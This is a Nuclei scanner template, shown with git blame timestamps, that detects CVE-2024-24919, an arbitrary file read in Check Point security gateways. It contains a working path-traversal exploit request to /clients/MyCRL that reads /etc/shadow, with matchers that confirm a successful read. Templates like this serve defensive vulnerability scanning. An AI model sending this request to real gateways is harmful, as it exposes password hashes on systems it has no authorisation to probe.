nuclei-templates/http/cves/2024/CVE-2024-24919.yaml

38 lines
1.1 KiB
YAML
Raw Normal View History

2024-05-30 03:36:42 +00:00
id: CVE-2024-24919
info:
2024-05-30 03:48:57 +00:00
name: Check Point R81, R80, R77, R75 - Arbitrary File Read
2024-05-30 03:36:42 +00:00
author: johnk3r
2024-05-30 03:48:57 +00:00
severity: high
description: |
CVE-2024-24919 is an information disclosure vulnerability that can allow an attacker to access certain information on internet-connected Gateways which have been configured with IPSec VPN, remote access VPN or mobile access software blade.
reference:
- https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/
2024-05-30 04:33:41 +00:00
- https://support.checkpoint.com/results/sk/sk182337
2024-05-30 03:36:42 +00:00
metadata:
max-request: 1
vendor: checkpoint
2024-05-30 09:39:10 +00:00
product: quantum_security_gateway
cpe: cpe:2.3:h:checkpoint:quantum_security_gateway:*:*:*:*:*:*:*:*
tags: cve,cve2024,checkpoint,lfi
2024-05-30 03:36:42 +00:00
http:
2024-05-30 04:52:03 +00:00
- raw:
- |
POST /clients/MyCRL HTTP/1.1
Host: {{Hostname}}
2024-05-30 03:36:42 +00:00
2024-05-30 04:52:03 +00:00
aCSHELL/../../../../../../../etc/shadow
2024-05-30 03:36:42 +00:00
matchers-condition: and
matchers:
- type: regex
part: body
regex:
2024-05-30 04:52:03 +00:00
- "root:"
- "nobody:"
2024-05-30 08:52:10 +00:00
condition: and
2024-05-30 03:36:42 +00:00
- type: status
status:
2024-05-30 04:52:03 +00:00
- 200